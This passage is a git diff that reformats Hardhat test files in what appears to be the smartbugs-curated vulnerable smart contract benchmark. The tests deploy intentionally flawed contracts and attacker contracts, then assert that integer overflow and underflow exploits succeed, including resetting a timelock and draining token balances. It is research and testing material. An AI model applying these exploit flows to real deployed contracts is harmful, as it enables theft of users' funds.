// We want to find map[0] + + // Compute keccak256 hash for storage slot + const storageSlot = ethers.keccak256( + ethers.AbiCoder.defaultAbiCoder().encode( + ["uint256", "uint256"], + [key, mappingSlot], + ), + ); + + let storedValue = await ethers.provider.getStorage( + overflow.target, + storageSlot, + ); + let value = Number(storedValue); + expect(value).to.be.equal(0); + + await overflow.init(0, 1); + + storedValue = await ethers.provider.getStorage( + overflow.target, + storageSlot, + ); + value = Number(storedValue); + const max = 2 ** 256 - 1; + expect(value).to.be.equal(max); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_minimal_test.js b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_minimal_test.js index dafbd88..dbc4a8d 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_minimal_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_minimal_test.js @@ -1,36 +1,44 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/integer_overflow_minimal.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/integer_overflow_minimal.sol/IntegerOverflowMinimal.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const IntegerOverflowAdd = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await IntegerOverflowAdd.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack arithmetic/integer_overflow_minimal.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/integer_overflow_minimal.sol/IntegerOverflowMinimal.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const IntegerOverflowAdd = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await IntegerOverflowAdd.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const IntegerOverflowMinimalAttacker = await ethers.getContractFactory('contracts/arithmetic/integer_overflow_minimal_attack.sol:IntegerOverflowMinimalAttacker'); - const attacker = await IntegerOverflowMinimalAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const IntegerOverflowMinimalAttacker = await ethers.getContractFactory( + "contracts/arithmetic/integer_overflow_minimal_attack.sol:IntegerOverflowMinimalAttacker", + ); + const attacker = await IntegerOverflowMinimalAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: arithmetic/integer_overflow_benign_1.sol', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await victim.run(0); - expect(await victim.count()).to.equal(1); - }); - - it('exploit underflow vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await victim.run(1); - expect(await victim.count()).to.equal(0); - await attacker.attack(); - expect(await victim.count()).to.greaterThan(0); - }); - }); \ No newline at end of file + it("sanity check: arithmetic/integer_overflow_benign_1.sol", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await victim.run(0); + expect(await victim.count()).to.equal(1); + }); + + it("exploit underflow vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await victim.run(1); + expect(await victim.count()).to.equal(0); + await attacker.attack(); + expect(await victim.count()).to.greaterThan(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mul_test.js b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mul_test.js index cf7e918..3f94dd6 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mul_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mul_test.js @@ -1,35 +1,42 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); +describe("attack arithmetic/integer_overflow_mul.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/integer_overflow_mul.sol/IntegerOverflowMul.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const IntegerOverflowMul = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const overflow = await IntegerOverflowMul.deploy(); + await overflow.waitForDeployment(); + const address = await overflow.getAddress(); -describe('attack arithmetic/integer_overflow_mul.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/integer_overflow_mul.sol/IntegerOverflowMul.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const IntegerOverflowMul = await ethers.getContractFactory(json.abi, json.bytecode); - const overflow = await IntegerOverflowMul.deploy(); - await overflow.waitForDeployment(); - const address = await overflow.getAddress(); + const IntegerOverflowMulAttacker = await ethers.getContractFactory( + "contracts/arithmetic/integer_overflow_mul_attack.sol:IntegerOverflowMulAttacker", + ); + const attacker = await IntegerOverflowMulAttacker.deploy(address); + await attacker.waitForDeployment(); + return { overflow, attacker }; + } - const IntegerOverflowMulAttacker = await ethers.getContractFactory('contracts/arithmetic/integer_overflow_mul_attack.sol:IntegerOverflowMulAttacker'); - const attacker = await IntegerOverflowMulAttacker.deploy(address); - await attacker.waitForDeployment(); - return {overflow, attacker}; - } + it("sanity check: arithmetic/integer_overflow_mul.sol", async function () { + const { overflow } = await loadFixture(deployContracts); + expect(await overflow.count()).to.equal(2); + await overflow.run(2); + expect(await overflow.count()).to.equal(4); + }); - it('sanity check: arithmetic/integer_overflow_mul.sol', async function () { - const {overflow} = await loadFixture(deployContracts); - expect(await overflow.count()).to.equal(2); - await overflow.run(2); - expect(await overflow.count()).to.equal(4); - }); - - it('exploit overflow vulnerability', async function () { - const {overflow, attacker} = await loadFixture(deployContracts); - expect(await overflow.count()).to.equal(2); - await attacker.attack(); - expect(await overflow.count()).to.equal(0); - }); - }); \ No newline at end of file + it("exploit overflow vulnerability", async function () { + const { overflow, attacker } = await loadFixture(deployContracts); + expect(await overflow.count()).to.equal(2); + await attacker.attack(); + expect(await overflow.count()).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_multifunc_feasible_test.js b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_multifunc_feasible_test.js index 3d444b7..c4b3746 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_multifunc_feasible_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_multifunc_feasible_test.js @@ -1,37 +1,44 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/integer_overflow_multitx_multifunc_feasible.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/integer_overflow_multitx_multifunc_feasible.sol/IntegerOverflowMultiTxMultiFuncFeasible.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - - const IntegerOverflowMultiTxMultiFuncFeasible = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await IntegerOverflowMultiTxMultiFuncFeasible.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack arithmetic/integer_overflow_multitx_multifunc_feasible.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/integer_overflow_multitx_multifunc_feasible.sol/IntegerOverflowMultiTxMultiFuncFeasible.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); - const IntegerOverflowMultiTxMultiFuncFeasibleAttacker = await ethers.getContractFactory('contracts/arithmetic/integer_overflow_multitx_multifunc_feasible_attack.sol:IntegerOverflowMultiTxMultiFuncFeasibleAttacker'); - const attacker = await IntegerOverflowMultiTxMultiFuncFeasibleAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const IntegerOverflowMultiTxMultiFuncFeasible = + await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await IntegerOverflowMultiTxMultiFuncFeasible.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - it('sanity check: arithmetic/integer_overflow_multitx_multifunc_feasible.sol', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await victim.init(); - await victim.run(1); - expect(await victim.count()).to.equal(0); - }); + const IntegerOverflowMultiTxMultiFuncFeasibleAttacker = + await ethers.getContractFactory( + "contracts/arithmetic/integer_overflow_multitx_multifunc_feasible_attack.sol:IntegerOverflowMultiTxMultiFuncFeasibleAttacker", + ); + const attacker = + await IntegerOverflowMultiTxMultiFuncFeasibleAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - - it('exploit underflow vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await attacker.attack(); - expect(await victim.count()).to.greaterThan(1); - }); - }); \ No newline at end of file + it("sanity check: arithmetic/integer_overflow_multitx_multifunc_feasible.sol", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await victim.init(); + await victim.run(1); + expect(await victim.count()).to.equal(0); + }); + + it("exploit underflow vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await attacker.attack(); + expect(await victim.count()).to.greaterThan(1); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_onefunc_feasible_test.js b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_onefunc_feasible_test.js index a3b86ae..25a817c 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_onefunc_feasible_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_multitx_onefunc_feasible_test.js @@ -1,36 +1,43 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/integer_overflow_multitx_onefunc_feasible.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/integer_overflow_multitx_onefunc_feasible.sol/IntegerOverflowMultiTxOneFuncFeasible.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const IntegerOverflowMultiTxMultiFuncFeasible = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await IntegerOverflowMultiTxMultiFuncFeasible.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack arithmetic/integer_overflow_multitx_onefunc_feasible.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/integer_overflow_multitx_onefunc_feasible.sol/IntegerOverflowMultiTxOneFuncFeasible.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const IntegerOverflowMultiTxMultiFuncFeasible = + await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await IntegerOverflowMultiTxMultiFuncFeasible.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const IntegerOverflowMultiTxMultiFuncFeasibleAttacker = await ethers.getContractFactory('contracts/arithmetic/integer_overflow_multitx_onefunc_feasible_attack.sol:IntegerOverflowMultiTxOneFuncFeasibleAttacker'); - const attacker = await IntegerOverflowMultiTxMultiFuncFeasibleAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const IntegerOverflowMultiTxMultiFuncFeasibleAttacker = + await ethers.getContractFactory( + "contracts/arithmetic/integer_overflow_multitx_onefunc_feasible_attack.sol:IntegerOverflowMultiTxOneFuncFeasibleAttacker", + ); + const attacker = + await IntegerOverflowMultiTxMultiFuncFeasibleAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: arithmetic/integer_overflow_multitx_onefunc_feasible.sol', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await victim.run(1); - await victim.run(1); - expect(await victim.count()).to.equal(0); - }); + it("sanity check: arithmetic/integer_overflow_multitx_onefunc_feasible.sol", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await victim.run(1); + await victim.run(1); + expect(await victim.count()).to.equal(0); + }); - - it('exploit underflow vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await attacker.attack(); - expect(await victim.count()).to.greaterThan(1); - }); - }); \ No newline at end of file + it("exploit underflow vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await attacker.attack(); + expect(await victim.count()).to.greaterThan(1); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/overflow_simple_add_test.js b/smartbugs-curated/0.4.x/test/arithmetic/overflow_simple_add_test.js index 09b9e45..53d007d 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/overflow_simple_add_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/overflow_simple_add_test.js @@ -1,36 +1,44 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/overflow_simple_add.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/overflow_simple_add.sol/Overflow_Add.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Overflow_Add = await ethers.getContractFactory(json.abi, json.bytecode); - const overflow = await Overflow_Add.deploy(); - await overflow.waitForDeployment(); - const address = await overflow.getAddress(); +describe("attack arithmetic/overflow_simple_add.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/overflow_simple_add.sol/Overflow_Add.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Overflow_Add = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const overflow = await Overflow_Add.deploy(); + await overflow.waitForDeployment(); + const address = await overflow.getAddress(); - const Overflow_AddAttacker = await ethers.getContractFactory('contracts/arithmetic/overflow_simple_add_attack.sol:Overflow_AddAttacker'); - const attacker = await Overflow_AddAttacker.deploy(address); - await attacker.waitForDeployment(); - return {overflow, attacker}; - } + const OverflowAddAttacker = await ethers.getContractFactory( + "contracts/arithmetic/overflow_simple_add_attack.sol:OverflowAddAttacker", + ); + const attacker = await OverflowAddAttacker.deploy(address); + await attacker.waitForDeployment(); + return { overflow, attacker }; + } - it('sanity check: arithmetic/overflow_simple_add.sol', async function () { - const {overflow} = await loadFixture(deployContracts); - expect(await overflow.balance()).to.equal(1); - await overflow.add(1); - expect(await overflow.balance()).to.equal(2); - }); - - it('exploit overflow vulnerability', async function () { - const {overflow, attacker} = await loadFixture(deployContracts); - expect(await overflow.balance()).to.equal(1); - await overflow.add(1); - expect(await overflow.balance()).to.equal(2); - await attacker.attack(); - expect(await overflow.balance()).to.equal(0); - }); - }); \ No newline at end of file + it("sanity check: arithmetic/overflow_simple_add.sol", async function () { + const { overflow } = await loadFixture(deployContracts); + expect(await overflow.balance()).to.equal(1); + await overflow.add(1); + expect(await overflow.balance()).to.equal(2); + }); + + it("exploit overflow vulnerability", async function () { + const { overflow, attacker } = await loadFixture(deployContracts); + expect(await overflow.balance()).to.equal(1); + await overflow.add(1); + expect(await overflow.balance()).to.equal(2); + await attacker.attack(); + expect(await overflow.balance()).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/overflow_single_tx_test.js b/smartbugs-curated/0.4.x/test/arithmetic/overflow_single_tx_test.js index 2bbb610..d357745 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/overflow_single_tx_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/overflow_single_tx_test.js @@ -1,64 +1,72 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/overflow_single_tx.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/overflow_single_tx.sol/IntegerOverflowSingleTransaction.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const IntegerOverflowSingleTransaction = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await IntegerOverflowSingleTransaction.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack arithmetic/overflow_single_tx.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/overflow_single_tx.sol/IntegerOverflowSingleTransaction.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const IntegerOverflowSingleTransaction = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await IntegerOverflowSingleTransaction.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const IntegerOverflowSingleTransactionAttacker = await ethers.getContractFactory('contracts/arithmetic/overflow_single_tx_attack.sol:IntegerOverflowSingleTransactionAttacker'); - const attacker = await IntegerOverflowSingleTransactionAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const IntegerOverflowSingleTransactionAttacker = + await ethers.getContractFactory( + "contracts/arithmetic/overflow_single_tx_attack.sol:IntegerOverflowSingleTransactionAttacker", + ); + const attacker = + await IntegerOverflowSingleTransactionAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: arithmetic/overflow_single_tx.sol add', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await victim.overflowaddtostate(1); - expect(await victim.count()).to.equal(2); - }); + it("sanity check: arithmetic/overflow_single_tx.sol add", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await victim.overflowaddtostate(1); + expect(await victim.count()).to.equal(2); + }); - it('sanity check: arithmetic/overflow_single_tx.sol mul', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await victim.overflowmultostate(2); - expect(await victim.count()).to.equal(2); - }); + it("sanity check: arithmetic/overflow_single_tx.sol mul", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await victim.overflowmultostate(2); + expect(await victim.count()).to.equal(2); + }); - it('sanity check: arithmetic/overflow_single_tx.sol sub', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await victim.underflowtostate(1); - expect(await victim.count()).to.equal(0); - }); + it("sanity check: arithmetic/overflow_single_tx.sol sub", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await victim.underflowtostate(1); + expect(await victim.count()).to.equal(0); + }); - - it('exploit overflow add vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await attacker.attackOverflowAddToState(); - expect(await victim.count()).to.equal(0); - }); + it("exploit overflow add vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await attacker.attackOverflowAddToState(); + expect(await victim.count()).to.equal(0); + }); - - it('exploit overflow mul vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await attacker.attackOverflowMulToState(); - expect(await victim.count()).to.equal(0); - }); + it("exploit overflow mul vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await attacker.attackOverflowMulToState(); + expect(await victim.count()).to.equal(0); + }); - it('exploit underflow vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - expect(await victim.count()).to.equal(1); - await attacker.attackUnderflowToState(); - expect(await victim.count()).to.greaterThan(1); - }); - }); \ No newline at end of file + it("exploit underflow vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + expect(await victim.count()).to.equal(1); + await attacker.attackUnderflowToState(); + expect(await victim.count()).to.greaterThan(1); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/timelock_test.js b/smartbugs-curated/0.4.x/test/arithmetic/timelock_test.js index f006b7e..1cf6dda 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/timelock_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/timelock_test.js @@ -1,61 +1,66 @@ -const { loadFixture, time } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { + loadFixture, + time, +} = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/timeLock.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/timelock.sol/TimeLock.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const TimeLock = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await TimeLock.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); - - const TimeLockAttacker = await ethers.getContractFactory('contracts/arithmetic/timelock_attack.sol:TimeLockAttacker'); - const attacker = await TimeLockAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: arithmetic/timeLock.sol', async function () { - const [sig] = await ethers.getSigners(); - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(sig).deposit({value:1})).to.not.be.reverted; - await victim.connect(sig).increaseLockTime(1); - await time.increase(3600 * 24 * 8); - await expect(victim.connect(sig).withdraw()).to.not.be.reverted; - expect(await victim.balances(sig.address)).to.equal(0); - }); - - - it('exploit overflow vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const attacker_addr = await attacker.getAddress(); - expect(await victim.balances(attacker_addr)).to.equal(0); - expect(await victim.lockTime(attacker_addr)).to.equal(0); - - const amount = ethers.parseEther("1.0"); - const options = {value: amount}; - - await attacker.deposit(options); - - expect(await victim.balances(attacker_addr)).to.equal(amount); - let lockTime = await victim.lockTime(attacker_addr); - expect(lockTime).to.greaterThan(0); - const attackerBalanceBefore = await ethers.provider.getBalance( - attacker_addr - ); - - expect(attackerBalanceBefore).to.equal(0); - await attacker.attack(); - lockTime = await victim.lockTime(attacker_addr); - expect(lockTime).to.equal(0); - - await attacker.withdraw(); - const attackerBalanceAfter = await ethers.provider.getBalance( - attacker_addr - ); - expect(attackerBalanceAfter).to.equal(amount); - }); - }); \ No newline at end of file +describe("attack arithmetic/timeLock.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/timelock.sol/TimeLock.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const TimeLock = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await TimeLock.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); + + const TimeLockAttacker = await ethers.getContractFactory( + "contracts/arithmetic/timelock_attack.sol:TimeLockAttacker", + ); + const attacker = await TimeLockAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } + + it("sanity check: arithmetic/timeLock.sol", async function () { + const [sig] = await ethers.getSigners(); + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(sig).deposit({ value: 1 })).to.not.be.reverted; + await victim.connect(sig).increaseLockTime(1); + await time.increase(3600 * 24 * 8); + await expect(victim.connect(sig).withdraw()).to.not.be.reverted; + expect(await victim.balances(sig.address)).to.equal(0); + }); + + it("exploit overflow vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const attacker_addr = await attacker.getAddress(); + expect(await victim.balances(attacker_addr)).to.equal(0); + expect(await victim.lockTime(attacker_addr)).to.equal(0); + + const amount = ethers.parseEther("1.0"); + const options = { value: amount }; + + await attacker.deposit(options); + + expect(await victim.balances(attacker_addr)).to.equal(amount); + let lockTime = await victim.lockTime(attacker_addr); + expect(lockTime).to.greaterThan(0); + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + + expect(attackerBalanceBefore).to.equal(0); + await attacker.attack(); + lockTime = await victim.lockTime(attacker_addr); + expect(lockTime).to.equal(0); + + await attacker.withdraw(); + const attackerBalanceAfter = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceAfter).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/token_test.js b/smartbugs-curated/0.4.x/test/arithmetic/token_test.js index 258399a..8837336 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/token_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/token_test.js @@ -1,43 +1,48 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/token.sol', function () { - let to_address; - let owner; - async function deployContracts() { - const randomPrivateKey = ethers.Wallet.createRandom().privateKey; - [owner] = await ethers.getSigners(); - to_address = ethers.computeAddress(randomPrivateKey); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/token.sol/Token.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Token = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Token.connect(owner).deploy(1); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack arithmetic/token.sol", function () { + let to_address; + let owner; + async function deployContracts() { + const randomPrivateKey = ethers.Wallet.createRandom().privateKey; + [owner] = await ethers.getSigners(); + to_address = ethers.computeAddress(randomPrivateKey); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/token.sol/Token.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Token = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Token.connect(owner).deploy(1); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const TokenAttacker = await ethers.getContractFactory('contracts/arithmetic/token_attack.sol:TokenAttacker'); - const attacker = await TokenAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const TokenAttacker = await ethers.getContractFactory( + "contracts/arithmetic/token_attack.sol:TokenAttacker", + ); + const attacker = await TokenAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: arithmetic/token.sol', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.balanceOf(owner.address)).to.equal(1); - expect(await victim.balanceOf(victim.target)).to.equal(0); - await victim.transfer(victim.target, 1); - expect(await victim.balanceOf(owner.address)).to.equal(0); - expect(await victim.balanceOf(victim.target)).to.equal(1); - }); - - it('exploit underflow vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const attacker_addr = await attacker.getAddress(); - expect(await victim.balanceOf(attacker_addr)).to.equal(0); - await attacker.attack(to_address); - expect(await victim.balanceOf(attacker_addr)).to.greaterThan(0); - expect(await victim.balanceOf(to_address)).to.equal(1); - }); - }); \ No newline at end of file + it("sanity check: arithmetic/token.sol", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.balanceOf(owner.address)).to.equal(1); + expect(await victim.balanceOf(victim.target)).to.equal(0); + await victim.transfer(victim.target, 1); + expect(await victim.balanceOf(owner.address)).to.equal(0); + expect(await victim.balanceOf(victim.target)).to.equal(1); + }); + + it("exploit underflow vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const attacker_addr = await attacker.getAddress(); + expect(await victim.balanceOf(attacker_addr)).to.equal(0); + await attacker.attack(to_address); + expect(await victim.balanceOf(attacker_addr)).to.greaterThan(0); + expect(await victim.balanceOf(to_address)).to.equal(1); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/tokensalechallenge_test.js b/smartbugs-curated/0.4.x/test/arithmetic/tokensalechallenge_test.js index 44ae128..c2d006b 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/tokensalechallenge_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/tokensalechallenge_test.js @@ -1,53 +1,63 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/tokensalechallenge.sol', function () { - async function deployContracts() { - const TokenSaleChallengeAttacker = await ethers.getContractFactory('contracts/arithmetic/tokensalechallenge_attack.sol:TokenSaleChallengeAttacker'); - const attacker = await TokenSaleChallengeAttacker.deploy(); +describe("attack arithmetic/tokensalechallenge.sol", function () { + async function deployContracts() { + const TokenSaleChallengeAttacker = await ethers.getContractFactory( + "contracts/arithmetic/tokensalechallenge_attack.sol:TokenSaleChallengeAttacker", + ); + const attacker = await TokenSaleChallengeAttacker.deploy(); await attacker.waitForDeployment(); const address = await attacker.getAddress(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/tokensalechallenge.sol/TokenSaleChallenge.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/tokensalechallenge.sol/TokenSaleChallenge.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); - const TokenSaleChallenge = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await TokenSaleChallenge.deploy(address, { value: ethers.parseEther('1') }); + const TokenSaleChallenge = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim 